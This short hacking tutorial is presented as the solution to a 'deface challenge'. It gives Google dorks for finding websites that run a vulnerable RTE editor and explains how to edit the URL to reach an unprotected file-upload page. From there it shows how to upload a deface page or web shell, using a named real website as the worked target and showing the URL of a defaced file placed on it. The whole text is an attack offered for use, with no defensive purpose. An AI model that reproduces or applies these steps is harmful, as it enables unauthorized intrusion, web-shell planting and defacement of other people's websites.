RTE remote File Upload Vulnerability

 Deface challenge number 1 solution



Hellow Everyone. Tonight I'm gonna
teach you an easy method of hacking
Called RTE. Here we go:


Google Dorks:
these dorks will help you to
find RTE Vulnerable websites
inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/


Exploit:
Replace in URL "rte/my_documents/my_files"
               with
 "/rte/RTE_popup_file_atch.asp"


For Example:
By Google Dorks I've Got this Site:
http://www.efytimes.com/admin/useradmin/rte/my_documents/my_files/


After Exploit it'll be look like this:
http://www.efytimes.com/admin/useradmin/rte/RTE_popup_file_atch.asp


Now you can also upload your Deface Page
/Pic/Shell here & watch its preview


After uploading your Deface Page It
will be look like this one:
http://www.efytimes.com/admin/useradmin/rte/my_documents/my_files/1A5_psychodevil_enc.html


Okk you just Hacked the site. Congratz X)